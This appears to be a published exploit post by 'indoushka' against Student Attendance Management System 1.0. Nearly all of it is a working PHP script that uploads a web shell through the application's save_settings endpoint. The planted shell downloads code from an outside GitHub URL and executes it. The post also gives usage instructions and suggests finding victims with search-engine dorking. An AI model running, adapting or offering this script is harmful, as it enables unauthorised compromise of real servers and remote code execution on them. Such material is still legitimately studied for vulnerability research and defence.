    =============================================================================================================================================| # Title     : Student Attendance Management System 1.0 code injection Vulnerability                                                       || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/student-attendance-management-system.zip              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] Line 28    Line 37  [+] change the path of the script folder.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'name' => 'Hacked By Indoushka',        'email' => 'indoushka4ever@gmail.com',    'contact' => '00213771818860',    'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/student_attendance/ajax.php?action=save_settings");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/student_attendance/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tag

#auth